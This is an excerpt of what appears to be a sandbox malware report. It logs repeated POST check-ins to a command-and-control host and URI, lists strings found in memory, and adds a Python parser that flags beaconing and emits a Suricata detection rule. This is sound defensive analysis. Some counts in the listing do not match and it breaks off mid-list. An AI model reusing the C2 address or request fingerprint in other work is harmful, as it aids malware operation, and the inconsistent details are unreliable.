    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 384
    Expect: 100-continue

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
    Expect: 100-continue

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 162168
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1820
    Expect: 100-continue

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1828
    Expect: 100-continue
    Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1820
    Expect: 100-continue
    Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (1.1.1.1 is Cloudflare's public DNS resolver; a flow to a resolver's own address never has a preceding lookup, so this entry is not an indicator by itself)
Source: global traffic | DNS traffic detected: DNS query: 664930cm.n9shka.top
Source: unknown | HTTP traffic detected: one further POST to the same endpoint, not attributed to a process, with a shorter body than the 46 above:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
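The POSTs above are the sample's check-in loop: one fixed URI, one fixed Opera 81 User-Agent, bodies of the same few sizes, and Expect: 100-continue, which .NET's HttpWebRequest adds to POSTs by default. The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it parses report lines in the flattened form shown in this export (header names run together because the line breaks were lost), groups requests by Host, method and URI, flags groups that look like beaconing, and renders a Suricata rule for a hit. The sample lines, the thresholds (min_requests, max_distinct_lengths) and the benign GET to www.example.com are constructed for the demonstration; only the C2 host, URI and User-Agent are taken from the observed requests.

```python
"""Parse flattened Joe Sandbox 'HTTP traffic detected' lines and flag beacon-like POST groups."""
import re
from collections import Counter, defaultdict

# Header names that may have been glued onto the previous value when the export lost line breaks.
HEADER_NAMES = ["Content-Type", "Content-Length", "User-Agent", "Host", "Expect",
                "Connection", "Accept", "Accept-Encoding", "Cache-Control"]
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
LINE_RE = re.compile(
    r"^Source: (?P<source>.*?)HTTP traffic detected: "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/(?P<version>\d\.\d)(?P<headers>.*)$")

# Constructed sample input in the report's flattened form (assumption: C2 host, URI and
# User-Agent as observed; body sizes and the benign GET are made up for the demo).
C2_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
         "Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60")
C2_PATH = "/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php"


def _c2_line(length, source="global traffic", keepalive=True):
    """Build one flattened report line for a check-in POST (sample data only)."""
    tail = "Connection: Keep-Alive" if keepalive else ""
    return (f"Source: {source}HTTP traffic detected: POST {C2_PATH} HTTP/1.1"
            f"Content-Type: application/x-www-form-urlencodedUser-Agent: {C2_UA}"
            f"Host: 664930cm.n9shka.topContent-Length: {length}Expect: 100-continue{tail}")


SAMPLE_LINES = [
    _c2_line(1120), _c2_line(1112), _c2_line(1820), _c2_line(1120, keepalive=False),
    _c2_line(1120), _c2_line(344, source="unknown"),
    "Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Host: www.example.com"
    "User-Agent: Mozilla/5.0Accept: text/htmlConnection: Keep-Alive",
]


def parse_report_line(line):
    """Return {source, method, path, version, headers} for one flattened line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    headers = {}
    # Split the glued header string at every position where a known header name begins.
    for chunk in HEADER_SPLIT.split(m["headers"]):
        if chunk:
            name, _, value = chunk.partition(": ")
            headers[name] = value
    return {"source": m["source"], "method": m["method"], "path": m["path"],
            "version": m["version"], "headers": headers}


def beacon_candidates(lines, min_requests=5, max_distinct_lengths=4):
    """Group requests by (Host, method, path) and flag groups that look like check-ins:
    many requests, a small set of body sizes and a single User-Agent.  'Expect: 100-continue'
    on a form POST is recorded because .NET's HttpWebRequest emits it by default."""
    groups = defaultdict(list)
    for line in lines:
        req = parse_report_line(line)
        if req:
            groups[(req["headers"].get("Host"), req["method"], req["path"])].append(req)
    findings = []
    for (host, method, path), reqs in groups.items():
        lengths = Counter(r["headers"].get("Content-Length") for r in reqs)
        agents = {r["headers"].get("User-Agent") for r in reqs}
        if len(reqs) < min_requests or len(lengths) > max_distinct_lengths or len(agents) != 1:
            continue
        findings.append({
            "host": host, "method": method, "path": path, "count": len(reqs),
            "content_lengths": dict(lengths), "user_agent": agents.pop(),
            "dotnet_expect_100": all(r["headers"].get("Expect") == "100-continue" for r in reqs),
            "form_post": all(r["headers"].get("Content-Type", "").startswith(
                "application/x-www-form-urlencoded") for r in reqs),
        })
    return findings


def suricata_rule(finding, sid):
    """Render a Suricata rule (5.x+ sticky-buffer syntax) pinning the observed host and URI."""
    return (f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"DCRat-style POST check-in to '
            f'{finding["host"]}"; flow:established,to_server; http.method; content:"{finding["method"]}"; '
            f'http.host; content:"{finding["host"]}"; http.uri; content:"{finding["path"]}"; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    for hit in beacon_candidates(SAMPLE_LINES):
        print(hit)
        print(suricata_rule(hit, 1000001))
```

The thresholds are deliberately loose because a sandbox run is short; on proxy logs you would add the inter-request timing variance as a third criterion. The rendered rule matches the exact host and URI, so it is precise but brittle against the next build's URI; the header combination (form POST, Expect: 100-continue, an outdated Opera UA string) is the more durable hunting pivot.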
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://664930cm.n9P (partial string as found in memory; compare the full host name in the next entries)
Source: conhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://664930cm.n9shka.top
Source: conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://664930cm.n9shka.top/
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.000000000280C000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002800000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php
Source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp, msinto.exe, 0000000A.00000002.2389367064.0000000003149000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (the .NET ClaimTypes.Name URI, a constant present in any .NET process that loads System.Security.Claims; not an indicator on its own)
Source: conhost.exe, the following 21 memory regions (the same set for each of the six strings below):
    00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp
